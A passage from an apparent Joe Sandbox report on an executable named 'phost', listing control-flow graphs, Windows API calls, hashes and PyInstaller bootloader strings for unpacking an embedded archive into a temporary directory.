276->291 295 7ff62cc73edb-7ff62cc73ef0 call 7ff62cc72a50 call 7ff62cc76fb0 call 7ff62cc76d60 290->295 292 7ff62cc73e97-7ff62cc73ea4 call 7ff62cc76df0 291->292 293 7ff62cc73eaf-7ff62cc73eb9 call 7ff62cc771a0 291->293 292->293 304 7ff62cc73ea6-7ff62cc73ead 292->304 305 7ff62cc73ebb-7ff62cc73ec2 293->305 306 7ff62cc73ec4-7ff62cc73ed2 call 7ff62cc774e0 293->306 295->239 304->295 305->295 306->239 319 7ff62cc73ed4 306->319 311 7ff62cc73fe9-7ff62cc73ff7 call 7ff62cc71900 307->311 312 7ff62cc73fa9-7ff62cc73fb3 call 7ff62cc79200 307->312 311->226 312->311 321 7ff62cc73fb5-7ff62cc73fca 312->321 319->295 322 7ff62cc73fcc-7ff62cc73fdf call 7ff62cc72710 call 7ff62cc71900 321->322 323 7ff62cc73fe4 call 7ff62cc72a50 321->323 322->226 323->311
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                              • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                              • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                              • Opcode ID: 5175dd211561270c01c090de14ed05897007262ae42d5fb09ddae339d6dfd05a
                                                                                                                                                                                                                              • Instruction ID: d91159f3654b64ad46d2a51dc8f32fd18666e8e3e401ee22508fd9f32b87e453
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5175dd211561270c01c090de14ed05897007262ae42d5fb09ddae339d6dfd05a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E32AE21F4C68291FF25DB29DD552B92279EF447A4F884032DA4DCB2C6EF2CE559E302

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 536 7ff62cc969d4-7ff62cc96a47 call 7ff62cc96708 539 7ff62cc96a61-7ff62cc96a6b call 7ff62cc88590 536->539 540 7ff62cc96a49-7ff62cc96a52 call 7ff62cc84f58 536->540 545 7ff62cc96a86-7ff62cc96aef CreateFileW 539->545 546 7ff62cc96a6d-7ff62cc96a84 call 7ff62cc84f58 call 7ff62cc84f78 539->546 547 7ff62cc96a55-7ff62cc96a5c call 7ff62cc84f78 540->547 549 7ff62cc96af1-7ff62cc96af7 545->549 550 7ff62cc96b6c-7ff62cc96b77 GetFileType 545->550 546->547 558 7ff62cc96da2-7ff62cc96dc2 547->558 556 7ff62cc96b39-7ff62cc96b67 GetLastError call 7ff62cc84eec 549->556 557 7ff62cc96af9-7ff62cc96afd 549->557 553 7ff62cc96b79-7ff62cc96bb4 GetLastError call 7ff62cc84eec CloseHandle 550->553 554 7ff62cc96bca-7ff62cc96bd1 550->554 553->547 570 7ff62cc96bba-7ff62cc96bc5 call 7ff62cc84f78 553->570 561 7ff62cc96bd3-7ff62cc96bd7 554->561 562 7ff62cc96bd9-7ff62cc96bdc 554->562 556->547 557->556 563 7ff62cc96aff-7ff62cc96b37 CreateFileW 557->563 567 7ff62cc96be2-7ff62cc96c37 call 7ff62cc884a8 561->567 562->567 568 7ff62cc96bde 562->568 563->550 563->556 575 7ff62cc96c56-7ff62cc96c87 call 7ff62cc96488 567->575 576 7ff62cc96c39-7ff62cc96c45 call 7ff62cc96910 567->576 568->567 570->547 582 7ff62cc96c89-7ff62cc96c8b 575->582 583 7ff62cc96c8d-7ff62cc96ccf 575->583 576->575 581 7ff62cc96c47 576->581 584 7ff62cc96c49-7ff62cc96c51 call 7ff62cc8ab30 581->584 582->584 585 7ff62cc96cf1-7ff62cc96cfc 583->585 586 7ff62cc96cd1-7ff62cc96cd5 583->586 584->558 589 7ff62cc96da0 585->589 590 7ff62cc96d02-7ff62cc96d06 585->590 586->585 588 7ff62cc96cd7-7ff62cc96cec 586->588 588->585 589->558 590->589 592 7ff62cc96d0c-7ff62cc96d51 CloseHandle CreateFileW 590->592 593 7ff62cc96d53-7ff62cc96d81 GetLastError call 7ff62cc84eec call 7ff62cc886d0 592->593 594 7ff62cc96d86-7ff62cc96d9b 592->594 593->594 594->589
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1617910340-0
                                                                                                                                                                                                                              • Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                              • Instruction ID: 7df44e4102c86179fbd9d14821d3b9baefb01ab3e15938cec973a855de33fc49
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46C1AF36B28A8186EF50DFA9C8906BD3771EB49BA8B019225DE2E977D4DF38D451C301

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(?,00007FF62CC78B09,00007FF62CC73FA5), ref: 00007FF62CC7841B
                                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?,00007FF62CC78B09,00007FF62CC73FA5), ref: 00007FF62CC7849E
                                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(?,00007FF62CC78B09,00007FF62CC73FA5), ref: 00007FF62CC784BD
                                                                                                                                                                                                                              • FindNextFileW.KERNELBASE(?,00007FF62CC78B09,00007FF62CC73FA5), ref: 00007FF62CC784CB
                                                                                                                                                                                                                              • FindClose.KERNEL32(?,00007FF62CC78B09,00007FF62CC73FA5), ref: 00007FF62CC784DC
                                                                                                                                                                                                                              • RemoveDirectoryW.KERNELBASE(?,00007FF62CC78B09,00007FF62CC73FA5), ref: 00007FF62CC784E5
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                              • String ID: %s\*
                                                                                                                                                                                                                              • API String ID: 1057558799-766152087
                                                                                                                                                                                                                              • Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                              • Instruction ID: 73ded091df39234f463fa43328688e7d89e14cb84603c2f2eb130bd565fcc088
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0141A232B0C94291EE309B28EC645B96374FF94774F800232D69DDAAD4DF7CD54A9702
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                                                                                                              • Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                              • Instruction ID: f948e57ca8638abdaf421297596fcdd9006840ea5b7e6967280019a7dc4aee91
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 88F0493271864286FF708B64B8597766370EB88778F084235D96D45AD4DF3CD05DD601

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 329 7ff62cc71950-7ff62cc7198b call 7ff62cc745b0 332 7ff62cc71991-7ff62cc719d1 call 7ff62cc77f80 329->332 333 7ff62cc71c4e-7ff62cc71c72 call 7ff62cc7c5c0 329->333 338 7ff62cc71c3b-7ff62cc71c3e call 7ff62cc800bc 332->338 339 7ff62cc719d7-7ff62cc719e7 call 7ff62cc80744 332->339 343 7ff62cc71c43-7ff62cc71c4b 338->343 344 7ff62cc71a08-7ff62cc71a24 call 7ff62cc8040c 339->344 345 7ff62cc719e9-7ff62cc71a03 call 7ff62cc84f78 call 7ff62cc72910 339->345 343->333 350 7ff62cc71a26-7ff62cc71a40 call 7ff62cc84f78 call 7ff62cc72910 344->350 351 7ff62cc71a45-7ff62cc71a5a call 7ff62cc84f98 344->351 345->338 350->338 359 7ff62cc71a5c-7ff62cc71a76 call 7ff62cc84f78 call 7ff62cc72910 351->359 360 7ff62cc71a7b-7ff62cc71afc call 7ff62cc71c80 * 2 call 7ff62cc80744 351->360 359->338 371 7ff62cc71b01-7ff62cc71b14 call 7ff62cc84fb4 360->371 374 7ff62cc71b16-7ff62cc71b30 call 7ff62cc84f78 call 7ff62cc72910 371->374 375 7ff62cc71b35-7ff62cc71b4e call 7ff62cc8040c 371->375 374->338 381 7ff62cc71b50-7ff62cc71b6a call 7ff62cc84f78 call 7ff62cc72910 375->381 382 7ff62cc71b6f-7ff62cc71b8b call 7ff62cc80180 375->382 381->338 389 7ff62cc71b8d-7ff62cc71b99 call 7ff62cc72710 382->389 390 7ff62cc71b9e-7ff62cc71bac 382->390 389->338 390->338 393 7ff62cc71bb2-7ff62cc71bb9 390->393 395 7ff62cc71bc1-7ff62cc71bc7 393->395 396 7ff62cc71bc9-7ff62cc71bd6 395->396 397 7ff62cc71be0-7ff62cc71bef 395->397 398 7ff62cc71bf1-7ff62cc71bfa 396->398 397->397 397->398 399 7ff62cc71bfc-7ff62cc71bff 398->399 400 7ff62cc71c0f 398->400 399->400 401 7ff62cc71c01-7ff62cc71c04 399->401 402 7ff62cc71c11-7ff62cc71c24 400->402 401->400 403 7ff62cc71c06-7ff62cc71c09 401->403 404 7ff62cc71c2d-7ff62cc71c39 402->404 405 7ff62cc71c26 402->405 403->400 406 7ff62cc71c0b-7ff62cc71c0d 403->406 404->338 404->395 405->404 406->402
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC77F80: _fread_nolock.LIBCMT ref: 00007FF62CC7802A
                                                                                                                                                                                                                              • _fread_nolock.LIBCMT ref: 00007FF62CC71A1B
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC72910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF62CC71B6A), ref: 00007FF62CC7295E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                              • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                              • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                              • Opcode ID: a160029e6a37842be442ab761c617b97701ff7f030f4f7bf0d288629a410a574
                                                                                                                                                                                                                              • Instruction ID: c2a2261a0094ef8775b33c91a0820f30aa242f53cdaacb0095c9c6d03841031e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a160029e6a37842be442ab761c617b97701ff7f030f4f7bf0d288629a410a574
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B81D071F0868295EF60CB28DC506BA63B4EF487A4F448135E98DCB789DE3CE1899742

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 407 7ff62cc71600-7ff62cc71611 408 7ff62cc71637-7ff62cc71651 call 7ff62cc745b0 407->408 409 7ff62cc71613-7ff62cc7161c call 7ff62cc71050 407->409 416 7ff62cc71682-7ff62cc7169c call 7ff62cc745b0 408->416 417 7ff62cc71653-7ff62cc71681 call 7ff62cc84f78 call 7ff62cc72910 408->417 414 7ff62cc7162e-7ff62cc71636 409->414 415 7ff62cc7161e-7ff62cc71629 call 7ff62cc72710 409->415 415->414 424 7ff62cc716b8-7ff62cc716cf call 7ff62cc80744 416->424 425 7ff62cc7169e-7ff62cc716b3 call 7ff62cc72710 416->425 432 7ff62cc716f9-7ff62cc716fd 424->432 433 7ff62cc716d1-7ff62cc716f4 call 7ff62cc84f78 call 7ff62cc72910 424->433 431 7ff62cc71821-7ff62cc71824 call 7ff62cc800bc 425->431 438 7ff62cc71829-7ff62cc7183b 431->438 436 7ff62cc71717-7ff62cc71737 call 7ff62cc84fb4 432->436 437 7ff62cc716ff-7ff62cc7170b call 7ff62cc71210 432->437 448 7ff62cc71819-7ff62cc7181c call 7ff62cc800bc 433->448 445 7ff62cc71739-7ff62cc7175c call 7ff62cc84f78 call 7ff62cc72910 436->445 446 7ff62cc71761-7ff62cc7176c 436->446 444 7ff62cc71710-7ff62cc71712 437->444 444->448 461 7ff62cc7180f-7ff62cc71814 445->461 450 7ff62cc71802-7ff62cc7180a call 7ff62cc84fa0 446->450 451 7ff62cc71772-7ff62cc71777 446->451 448->431 450->461 454 7ff62cc71780-7ff62cc717a2 call 7ff62cc8040c 451->454 462 7ff62cc717da-7ff62cc717e6 call 7ff62cc84f78 454->462 463 7ff62cc717a4-7ff62cc717bc call 7ff62cc80b4c 454->463 461->448 468 7ff62cc717ed-7ff62cc717f8 call 7ff62cc72910 462->468 469 7ff62cc717c5-7ff62cc717d8 call 7ff62cc84f78 463->469 470 7ff62cc717be-7ff62cc717c1 463->470 474 7ff62cc717fd 468->474 469->468 470->454 473 7ff62cc717c3 470->473 473->474 474->450
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                              • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                              • Opcode ID: b7cfde611c470d5de2a22cfb734085cfddee959ab285f2d596dd9298a7ff1e46
                                                                                                                                                                                                                              • Instruction ID: 6c96872fd3c04f717ddf50332f0eeaef5c0b80b224cbd514c2afb797666a725a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b7cfde611c470d5de2a22cfb734085cfddee959ab285f2d596dd9298a7ff1e46
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E351B031B0864392EE119B199C105BA63B4FF44BB8F444635EE0C8B79ADF3CE549E342

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetTempPathW.KERNEL32(?,?,00000000,00007FF62CC73CBB), ref: 00007FF62CC788F4
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00007FF62CC73CBB), ref: 00007FF62CC788FA
                                                                                                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00007FF62CC73CBB), ref: 00007FF62CC7893C
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC78A20: GetEnvironmentVariableW.KERNEL32(00007FF62CC7388E), ref: 00007FF62CC78A57
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC78A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF62CC78A79
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC882A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62CC882C1
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC72810: MessageBoxW.USER32 ref: 00007FF62CC728EA
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                              • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                              • Opcode ID: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
                                                                                                                                                                                                                              • Instruction ID: 7a4a8b3e2f65bae2bc4e16544f6c3f064f679bdbd2ccd38a7ae920dcf4e9da43
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A9418F21B1C64240FE25EB2DAD552BA12B4EF897E4F404131EE0DDB696EE3CE5099342

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 599 7ff62cc71210-7ff62cc7126d call 7ff62cc7bdf0 602 7ff62cc71297-7ff62cc712af call 7ff62cc84fb4 599->602 603 7ff62cc7126f-7ff62cc71296 call 7ff62cc72710 599->603 608 7ff62cc712d4-7ff62cc712e4 call 7ff62cc84fb4 602->608 609 7ff62cc712b1-7ff62cc712cf call 7ff62cc84f78 call 7ff62cc72910 602->609 614 7ff62cc71309-7ff62cc7131b 608->614 615 7ff62cc712e6-7ff62cc71304 call 7ff62cc84f78 call 7ff62cc72910 608->615 620 7ff62cc71439-7ff62cc7144e call 7ff62cc7bad0 call 7ff62cc84fa0 * 2 609->620 618 7ff62cc71320-7ff62cc71345 call 7ff62cc8040c 614->618 615->620 628 7ff62cc7134b-7ff62cc71355 call 7ff62cc80180 618->628 629 7ff62cc71431 618->629 637 7ff62cc71453-7ff62cc7146d 620->637 628->629 635 7ff62cc7135b-7ff62cc71367 628->635 629->620 636 7ff62cc71370-7ff62cc71398 call 7ff62cc7a230 635->636 640 7ff62cc7139a-7ff62cc7139d 636->640 641 7ff62cc71416-7ff62cc7142c call 7ff62cc72710 636->641 642 7ff62cc71411 640->642 643 7ff62cc7139f-7ff62cc713a9 640->643 641->629 642->641 645 7ff62cc713ab-7ff62cc713b9 call 7ff62cc80b4c 643->645 646 7ff62cc713d4-7ff62cc713d7 643->646 651 7ff62cc713be-7ff62cc713c1 645->651 648 7ff62cc713ea-7ff62cc713ef 646->648 649 7ff62cc713d9-7ff62cc713e7 call 7ff62cc99ea0 646->649 648->636 650 7ff62cc713f5-7ff62cc713f8 648->650 649->648 653 7ff62cc7140c-7ff62cc7140f 650->653 654 7ff62cc713fa-7ff62cc713fd 650->654 655 7ff62cc713c3-7ff62cc713cd call 7ff62cc80180 651->655 656 7ff62cc713cf-7ff62cc713d2 651->656 653->629 654->641 658 7ff62cc713ff-7ff62cc71407 654->658 655->648 655->656 656->641 658->618
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                              • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                              • Opcode ID: 5203fde90a14cfca52878d148793ed0f56fa2f4a03ba52266beea290f2c18543
                                                                                                                                                                                                                              • Instruction ID: 6de156a15c2040317328a8afe42b7c9599c13c37742a4f841dc13d74ec64d578
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5203fde90a14cfca52878d148793ed0f56fa2f4a03ba52266beea290f2c18543
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C851D832B0864285EE619B19AC503BA62B5FF85BB4F444235ED4DCBBC9DE3CE509D701

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF62CC8F11A,?,?,-00000018,00007FF62CC8ADC3,?,?,?,00007FF62CC8ACBA,?,?,?,00007FF62CC85FAE), ref: 00007FF62CC8EEFC
